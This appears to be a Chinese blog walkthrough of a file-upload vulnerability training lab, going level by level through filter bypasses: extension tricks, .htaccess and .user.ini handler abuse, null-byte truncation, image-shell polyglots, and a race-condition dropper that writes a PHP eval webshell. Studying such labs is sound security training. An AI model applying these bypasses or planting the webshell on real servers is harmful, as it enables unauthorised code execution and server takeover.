文件上传漏洞详解

第一关

步骤一,打开第一关先点击浏览上传一个jpg格式的图片

步骤二,打开BP修改jpg为php然后放包

步骤三,右键打开图像

成功解析

步骤四,打开蚁剑

第一关还是蛮简单的

第二关

步骤一,打开第二关先点击浏览上传一个jpg格式的图片

步骤二,打开BP修改jpg为php然后放包

步骤三,右键打开图像

步骤四,打开蚁剑

一二关步骤一样...

第三关

步骤一,我们尝试看看能不能上传1.php

我们获得提示:不允许上传.asp,.aspx,.php,.jsp后缀文件!

步骤二,我们尝试改一下文件名称后面加个数字1.php5

步骤三,右键打开图像

成功解析

第四关

环境不行得需要在fofa找一个靶场

编写.htaccess文件,内容解释:将1.jpg文件解析成php文件

<FilesMatch "1.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

步骤一,上传.htaccess文件

步骤二,在上传一个1.jpg

步骤三,右键打开图像

成功解析

第五关

文件包含操作

auto_prepend_file ="x.jpg"表示加载第一个PHP代码之前执行指示(包含的)文件

步骤一,上传.htaccess文件.user.ini文件内容

步骤二,在上传一个1.jpg

步骤三,访问readme.php文件

第六关

步骤一,使用大小写绕过

步骤二,右键打开图像

成功解析

第七关

步骤一,打开BP1.php后面加个空格

步骤二,右键打开图像

成功解析

第八关

步骤一,打开BP在文件名称后面加个'.'

步骤二,右键打开图像

成功解析

第九关

步骤一,打开BP在文件名称后面加个'::$DATA'

步骤二,右键打开图像

成功解析

第十关

步骤一,打开BPphp后面加上'. .'

步骤二,右键打开图像

成功解析

第十一关

双写后缀名绕过

步骤一,点击浏览上传php文件

步骤二,右键打开图像

成功解析

第十二关

步骤一,打开BP

在第一行添加xxx.php%00

把php改为jpg

步骤二,右键打开图像

删掉php后面的东西

成功解析

第十三关

这段代码同样是⽩名单限制后缀名,$_POST['save_path']是接收客户端提交的值,客户端可任意修改。所以会产⽣安全漏洞;

POST 下直接注⼊%00 是不⾏的,需要把%00 解码变成空⽩符,截断才有效。才能把⽬录截断成⽂件名;

步骤一,打开BP

添加xxx.php (空格)

把php改为jpg

将%00的hex码更改为00,然后上传

步骤二,右键打开图像

删掉php后面的东西

成功解析

第十四关

⽂件头代表了⽂件是那种类型,我们上传的⽂件内容如果是只有php代码,那么程序在对我们的⽂件头部进⾏检查时,如果发现没有允许上传⽂件类型的⽂件头,就会对我们上传⽂件进⾏拦截。

步骤一,制作图⽚⼀句话,使⽤copy a.jpg/b+1.php/a shell.jpg将 php ⽂件附加在 jpg 图⽚上,直接上传即可;

/b代表以⼆进制编码打开⽂件,/a代表以ASCII码编码打开⽂件

步骤二,上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十五关

步骤一,上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十六关

环境不支持

第十七关

**步骤一:**我们找到php ⽬录 执⾏ php 1.php 就会给我们⽣成⼀个1.png⽂件

步骤二,图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

步骤三,复制地址去蚁剑连接

第十八关

步骤一,php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二,上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤三,访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤四,同时攻击,直到出现webshell.php

步骤五,使用蚁剑连接

第二十关

步骤一,上传php文件,保存名称改为1.php/.

步骤二,图片右键新建标签页打开图片

相关推荐
Billy_Zuo8 分钟前
Android获取状态栏、导航栏的高度
android
ndzj98147967315 分钟前
Android Cookie读写
android
不做签到员18 分钟前
YOLOv8-Pose NCNN安卓部署
android·yolo·安卓·yolov8·ncnn·yolov8pose·优化部署
Just_Paranoid4 小时前
Android 自定义应用选择器对话框
android·intent·chooser
Ruannn(努力版)7 小时前
Android习题第一章
android
Duck Bro12 小时前
MySQL:表的增删改查(CRUD)
android·java·数据库·c++·mysql
丁大黄16 小时前
【Android】Android 服务保活/常驻
android
少说多做34316 小时前
Android 单选框RadioGroup+RadioButton
android
guoruijun_2012_417 小时前
安卓 获取 喇叭 听筒 音频输出流 AudioPlaybackCapture API 可以捕获音频输出流
android·音视频
昊虹AI笔记18 小时前
PHP中类名加双冒号的作用
android·java·php